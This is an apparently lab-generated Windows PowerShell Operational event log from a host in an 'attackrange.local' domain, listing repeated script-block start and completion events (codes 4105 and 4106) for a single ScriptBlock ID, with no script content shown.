06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471939
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471938
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471937
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471936
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471935
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471934
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471933
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471932
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471931
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471930
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471929
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471928
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471927
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471926
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471925
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471924
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471923
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471922
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471921
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471920
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471919
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471918
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471917
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471916
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471915
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471914
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471913
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471912
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471911
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471910
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471909
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471908
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471907
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471906
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471905
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471904
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471903
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471902
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471901
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471900
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471899
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471898
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471897
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471896
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471895
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471894
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471893
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471892
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471891
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471890
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471889
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471888
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471887
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471886
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471885
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
